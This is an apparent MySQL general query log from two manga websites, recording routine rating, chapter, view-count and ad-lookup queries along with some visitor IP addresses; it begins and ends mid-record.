order by created desc 330640969 Quit 330640970 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640970 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '352' order by created desc 330640970 Quit 330640971 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640971 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '357' order by created desc 330640971 Quit 330640972 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640972 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '354' order by created desc 330640972 Quit 330640973 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640973 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '386' order by created desc 330640973 Quit 330640974 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640974 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '333' order by created desc 330640974 Quit 330640975 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640975 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '353' order by created desc 330640975 Quit 330640976 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640976 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '350' order by created desc 330640976 Quit 330640977 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640977 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '376' order by created desc 330640977 Quit 330640978 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640978 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '381' order by created desc 330640978 Quit 330640979 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640979 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '346' order by created desc 330640979 Quit 330640980 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640980 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '309' order by created desc 330640980 Quit 330640981 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640981 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '316' order by created desc 330640981 Quit 330640982 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640982 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '384' order by created desc 330640982 Quit 330640983 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640983 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '291' order by created desc 330640983 Quit 330640984 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640984 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '359' order by created desc 330640984 Quit 330640985 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640985 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '377' order by created desc 330640985 Quit 330640986 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640986 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '378' order by created desc 330640986 Quit 330640987 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640987 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '282' order by created desc 330640987 Quit 330640988 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640988 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '345' order by created desc 330640988 Quit 330640989 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640989 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '296' order by created desc 330640989 Quit 330640990 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640990 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '360' order by created desc 330640990 Quit 330640947 Quit 330640991 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640991 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '383' order by created desc 330640991 Quit 330640992 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640992 Query select k.* from (select m.*, count(r.id) as total_rating, (sum(r.rating) / count(r.id)) as average_rating, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM ratings as r join mangas as m on (m.id = r.manga_id AND m.status = 'Finished') group by r.manga_id) as k ORDER BY k.id DESC 330640993 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640993 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '375' order by created desc 330640993 Quit 330640994 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640994 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '305' order by created desc 330640994 Quit 330640995 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640995 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '385' order by created desc 330640995 Quit 330640996 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640996 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '369' order by created desc 330640996 Quit 330640997 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640997 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '387' order by created desc 330640997 Quit 330640998 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640998 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '362' order by created desc 330640998 Quit 330640999 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640999 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '388' order by created desc 330640999 Quit 330641000 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641000 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '364' order by created desc 330641000 Quit 330641001 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641001 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '389' order by created desc 330641001 Quit 330641002 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641002 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '365' order by created desc 330641002 Quit 330641003 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641003 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '379' order by created desc 330641003 Quit 330641004 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641004 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '370' order by created desc 330641004 Quit 330641005 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641005 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '390' order by created desc 330641005 Quit 330641006 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641007 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641007 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330641006 Quit 330641007 Quit 330640656 Quit 330641008 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641009 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641008 Quit 330641009 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330641009 Quit 330641010 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641011 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641010 Quit 330641011 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330641011 Quit 330641012 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641013 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641012 Quit 330641013 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330641013 Quit 330641014 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641015 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641016 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641017 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641015 Quit 330641017 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330641017 Quit 330641014 Quit 330641016 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '12253' 330641016 Quit 330641018 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641018 Query select * FROM chapters where id = '12253' 330641018 Quit 330641019 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641019 Query select * FROM chapters where manga_id = '206' order by id desc 330641019 Quit 330641020 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641020 Query Update chapters set view=view+1 where id = '12253' 330641020 Quit 330641021 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641021 Query select * FROM chapters where id = '12253' 330641021 Quit 330641022 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641022 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '12253' 330641022 Quit 330641023 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641023 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('206', '12253', '176.41.24.80', 'mangacherri.com', '2026-02-26 03:28:06', '2026-02-26 03:28:06') 330641023 Quit 330641024 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641024 Query select * FROM chapter_images where chapter_id = '12253' 330641024 Quit 330641025 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641025 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '206' and m.active = 1 330641025 Quit 330641026 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641026 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='206' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Drama%' OR genres like '%Mystery%' OR genres like '%Psychological%' OR genres like '%Romance%' OR genres like '%School%' OR genres like '%Seinen%') ORDER BY RAND() limit 10 330641027 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641028 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641027 Quit 330641028 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '219' and m.active = 1 330641028 Quit 330641029 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641029 Query select * FROM chapters where id = '219' 330641029 Quit 330641030 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641030 Query select * FROM chapters where manga_id = '20' order by display_priority ASC, id desc 330641030 Quit 330641031 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641031 Query Update chapters set view=view+1 where id = '219' 330641031 Quit 330641032 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641032 Query select * FROM chapters where id = '219' 330641032 Quit 330641033 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641033 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '219' and m.active = 1 330641034 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641033 Quit 330641034 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('20', '219', '50.203.254.252', 'mangaberri.com', '2026-02-26 03:28:06', '2026-02-26 03:28:06') 330641034 Quit 330641035 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641035 Query select * FROM chapter_images where chapter_id = '219' 330641035 Quit 330641036 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641036 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '20' and m.active = 1 330641036 Quit 330641037 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641037 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='20' and m.active = 1 AND (genres like '%Action%' OR genres like '%Comedy%' OR genres like '%Martial Arts%' OR genres like '%Sci-Fi%' OR genres like '%Shounen%' OR genres like '%Space%' OR genres like '%Super Power%') ORDER BY RAND() limit 10 330641037 Quit 330641038 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641039 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641038 Quit 330641039 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330641039 Quit 330641040 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641041 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641040 Quit 330641041 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330641041 Quit 330641042 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641043 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641042 Quit 330641043 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330641043 Quit 330641044 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641045 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641044 Quit 330641045 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330641045 Quit 330641046 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641047 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641046 Quit 330641047 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '373' and m.active = 1 330641047 Quit 330641048 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641048 Query select * FROM chapters where id = '373' 330641048 Quit 330641049 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641049 Query select * FROM chapters where manga_id = '22' order by display_priority ASC, id desc 330641049 Quit 330641050 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641050 Query Update chapters set view=view+1 where id = '373' 330641050 Quit 330641051 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641051 Query select * FROM chapters where id = '373' 330641052 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641052 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '373' and m.active = 1 330641051 Quit 330641052 Quit 330641053 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641053 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('22', '373', '162.219.62.19', 'mangaberri.com', '2026-02-26 03:28:06', '2026-02-26 03:28:06') 330641053 Quit 330641054 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641054 Query select * FROM chapter_images where chapter_id = '373' 330641054 Quit 330641055 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641055 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '22' and m.active = 1 330641055 Quit 330641056 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641056 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='22' and m.active = 1 AND (genres like '%Action%' OR genres like '%Demons%' OR genres like '%Drama%' OR genres like '%Magic%' OR genres like '%Martial Arts%' OR genres like '%School%' OR genres like '%Shounen%' OR genres like '%Super Power%' OR genres like '%Supernatural%') ORDER BY RAND() limit 10 330641056 Quit 330641057 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641058 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641058 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330641057 Quit 330641058 Quit 330641059 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641060 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641060 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330641059 Quit 330641060 Quit 330641061 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641062 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641061 Quit 330641062 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330641062 Quit 330641063 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641064 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641063 Quit 330641064 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330641064 Quit 330640992 Quit 330641065 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641066 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641065 Quit 330641066 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330641066 Quit 330641067 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641067 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '356' order by created desc 330641067 Quit 330641068 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641068 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '330' order by created desc 330641068 Quit 330641069 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641069 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '256' order by created desc 330641069 Quit 330641070 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641070 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '282' order by created desc 330641070 Quit 330641071 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641071 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '300' order by created desc 330641071 Quit 330641072 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641072 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '40' order by created desc 330641072 Quit 330641073 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641073 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '299' order by created desc 330641073 Quit 330641074 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641074 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '107' order by created desc 330641074 Quit 330641075 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641075 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '18' order by created desc 330641075 Quit 330641076 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641076 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '109' order by created desc 330641076 Quit 330641077 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641077 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '387' order by created desc 330641077 Quit 330641078 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641078 Query select * FROM chapters where manga_id = '387' order by created desc limit 1 330641078 Quit 330641079 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641079 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '272' order by created desc 330641079 Quit 330641080 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641080 Query select * FROM chapters where manga_id = '272' order by created desc limit 1 330641080 Quit 330641081 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641081 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '361' order by created desc 330641081 Quit 330641082 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641082 Query select * FROM chapters where manga_id = '361' order by created desc limit 1 330641082 Quit 330641083 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641083 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '57' order by created desc 330641083 Quit 330641084 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641084 Query select * FROM chapters where manga_id = '57' order by created desc limit 1 330641084 Quit 330641085 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641085 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '285' order by created desc 330641085 Quit 330641086 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641086 Query select * FROM chapters where manga_id = '285' order by created desc limit 1 330641086 Quit 330641087 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641087 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '104' order by created desc 330641087 Quit 330641088 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641088 Query select * FROM chapters where manga_id = '104' order by created desc limit 1 330641088 Quit 330641089 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641089 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '290' order by created desc 330641089 Quit 330641090 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641090 Query select * FROM chapters where manga_id = '290' order by created desc limit 1 330641090 Quit 330641091 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641091 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '40' order by created desc 330641091 Quit 330641092 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641092 Query select * FROM chapters where manga_id = '40' order by created desc limit 1 330641092 Quit 330641093 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641093 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '386' order by created desc 330641093 Quit 330641094 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641094 Query select * FROM chapters where manga_id = '386' order by created desc limit 1 330641094 Quit 330641095 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641095 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '385' order by created desc 330641095 Quit 330641096 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641096 Query select * FROM chapters where manga_id = '385' order by created desc limit 1 330641096 Quit 330641097 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641097 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '384' order by created desc 330641097 Quit 330641098 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641098 Query select * FROM chapters where manga_id = '384' order by created desc limit 1 330641098 Quit 330641099 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641099 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '382' order by created desc 330641099 Quit 330641100 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641100 Query select * FROM chapters where manga_id = '382' order by created desc limit 1 330641100 Quit 330641101 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641101 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '80' order by created desc 330641101 Quit 330641102 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641102 Query select * FROM chapters where manga_id = '80' order by created desc limit 1 330641102 Quit 330641103 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641103 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '377' order by created desc 330641103 Quit 330641104 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641104 Query select * FROM chapters where manga_id = '377' order by created desc limit 1 330641104 Quit 330641105 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641105 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '390' order by created desc 330641105 Quit 330641106 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641106 Query select * FROM chapters where manga_id = '390' order by created desc limit 1 330641106 Quit 330641107 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641107 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '327' order by created desc 330641107 Quit 330641108 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641108 Query select * FROM chapters where manga_id = '327' order by created desc limit 1 330641108 Quit 330641109 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641109 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '376' order by created desc 330641109 Quit 330641110 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641110 Query select * FROM chapters where manga_id = '376' order by created desc limit 1 330641110 Quit 330641111 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641111 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '373' order by created desc 330641111 Quit 330641112 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641112 Query select * FROM chapters where manga_id = '373' order by created desc limit 1 330641112 Quit 330641113 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641113 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '388' order by created desc 330641113 Quit 330641114 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641114 Query select * FROM chapters where manga_id = '388' order by created desc limit 1 330641114 Quit 330641115 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641115 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '173' order by created desc 330641115 Quit 330641116 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641116 Query select * FROM chapters where manga_id = '173' order by created desc limit 1 330641116 Quit 330641117 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641117 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '35' order by created desc 330641117 Quit 330641118 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641118 Query select * FROM chapters where manga_id = '35' order by created desc limit 1 330641118 Quit 330641119 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641119 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '296' order by created desc 330641119 Quit 330641120 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641120 Query select * FROM chapters where manga_id = '296' order by created desc limit 1 330641120 Quit 330641121 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641121 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '22' order by created desc 330641121 Quit 330641122 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641122 Query select * FROM chapters where manga_id = '22' order by created desc limit 1 330641122 Quit 330641123 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641123 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '83' order by created desc 330641123 Quit 330641124 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641124 Query select * FROM chapters where manga_id = '83' order by created desc limit 1 330641124 Quit 330641125 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641125 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '346' order by created desc 330641125 Quit 330641126 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641126 Query select * FROM chapters where manga_id = '346' order by created desc limit 1 330641126 Quit 330641127 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641127 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '240' order by created desc 330641127 Quit 330641128 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641128 Query select * FROM 